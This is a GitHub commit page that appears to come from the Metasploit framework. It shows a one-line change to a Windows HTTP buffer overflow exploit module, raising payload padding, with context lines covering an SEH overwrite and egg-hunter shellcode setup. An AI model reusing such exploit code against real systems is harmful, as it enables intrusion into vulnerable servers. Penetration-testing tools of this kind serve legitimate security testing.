Skip to content

Commit 7854c45

Browse files
committed
Added more payload padding
1 parent a35d548 commit 7854c45

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/windows/http/intrasrv_bof.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -86,7 +86,7 @@ def exploit
8686
buf << [target.ret].pack("V*") # seh
8787

8888
# Setup payload
89-
shellcode = rand_text(1) # align payload
89+
shellcode = rand_text(50) # pad payload
9090
shellcode = egg + egg # attach egg tags
9191
shellcode << payload.encoded
9292

0 commit comments

Comments
 (0)